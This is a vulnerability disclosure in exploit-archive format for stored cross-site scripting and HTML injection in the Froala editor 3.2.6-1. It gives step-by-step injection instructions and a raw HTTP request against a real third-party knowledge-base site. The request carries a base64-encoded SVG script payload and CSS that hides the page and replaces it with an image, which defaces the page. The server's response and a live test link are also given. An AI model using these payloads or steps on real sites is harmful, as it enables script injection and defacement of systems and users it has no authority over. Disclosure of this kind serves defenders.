Froala version 3.2.6-1 suffers from persistent cross site scripting vulnerabilities.
9a819a95233892d40a1f0d262acbd828
# Exploit Title: Stored XSS and Html Code Injection Editor Froala
# Version 3.2.6-1
# Date:06.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://froala.com/wysiwyg-editor/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
PoC:
In the Froala I used xss code in base 64 and some tags for html code injection.
Vuln Fields: Embed Url,Insert Link,Insert Files,Insert Video,etc.
Example with Insert Files or Insert Image:
Click browse files – choose file img from computer
Insert on page , click on image and choose Insert Link and paste XSS code:
And insert! We have stored xss + full html code Injection deface page.
XSS Code:
https://pastebin.com/jUUXQbzs
Video with XSS and Html Code Injection:
https://www.youtube.com/watch?v=QO2XiR8N1P0
All fields with xss in base64 vulnerable to XSS. You can use method
Get or Post.
Encode your xss is here:
https://www.base64encode.org/
For Html Code Injection i use tags:
Table,Div,span,style,body and another.
Pictures:
https://imgur.com/a/WIfQQw5
https://imgur.com/a/P59ePrm
https://imgur.com/a/Ksc5VWX
Simple example on knowledgeowl.com: (They use Froala)
Create new article and in editor choose and press "Code View":
Paste xss code and again press "Code View" and save this.
Example link : https://test345.knowledgeowl.com/help/asxdcfvgbvnm
(Link works only 1 months)
https://app.knowledgeowl.com/kb/article-edit-save
Host: app.knowledgeowl.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------116499600342865829691384395973
Content-Length: 4793
Origin: https://app.knowledgeowl.com
Connection: keep-alive
Referer: https://app.knowledgeowl.com/kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f
Cookie: (i delete this)
Upgrade-Insecure-Requests: 1
article-id=60464e9e8e121c1923587f5f&project_id=6043b120ec161c7539dea231&language=en¤t_version=60464f2a8e121c172358807e&version=&category=&content_article=&linked_article=&dopen=1615238721&save-action=default&url_hash=asxdcfvgbvnm&title=asxdcfvgbvnm&toc_title=&internal_title=&art-redirect-url=&art-redirect-newtab=true&content=<p>""><embed
src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxCjk0IiBoZWlnaHQ9IjIwMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJJIGVuY29kZWQgeHNzIGluIGJhc2UgNjQuIEFic29sdXRlbHkgYWxsIGVkaXRvcnMgdnVsbmFyYWJsZSB0byB4c3MgYW5kIGh0bWwvaWZyYW1lIGNvZGUgaW5qZWN0aW9uIGFuZCB0aGlzIGlzIG5vdCBhIGJpZyBwcm9ibGVtLCBiZWNhdXNlIHRoaXMgaXMgY2FuIGZpeGVkLiBGaXggb24gZWRpdG9yIHNpZGUgYW5kIHlvdXIgc29mdHdhcmUuIFdoYXQgZWRpdG9ycyB0aGUgYmVzdD8gVGlueU1DRSwgRnJvYWxhIGFuZCBDa2VkaXRvciEiKTs8L3NjcmlwdD48L3N2Zz4KCgo="></p><style>body{visibility:hidden;}html{background:
url(https://i.pinimg.com/originals/07/02/00/0702007f97e1804a8ca00fb36033e9ec.jpg)
round;}</style>&meta_page_title=&meta_description=&status=published&date_published=&author=6043b10eec161c8d39dea36f&visibility=public&callout=none&callout_expire=03/15/2021&version_type=&custom-version=&version_note=&related-id[]=&application_screens=&csrf-token=af5366a45b186b5407fb55a1285b0f6ece862e25a46ebcfc070ab1d146b8b990
POST: HTTP/1.1 302 Found
Date: Mon, 08 Mar 2021 16:25:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _authbysession=90d12858ba2ea25a0ad42782; expires=Mon,
08-Mar-2021 18:25:33 GMT; Max-Age=7200; path=/;
domain=app.knowledgeowl.com; secure; httponly
Location: /kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 21
Content-Type: text/html; charset=UTF-8
The final results in a simple form:
We can use different fields in Froal's editor using cross site
scripting and html/iframe code injection in base 64.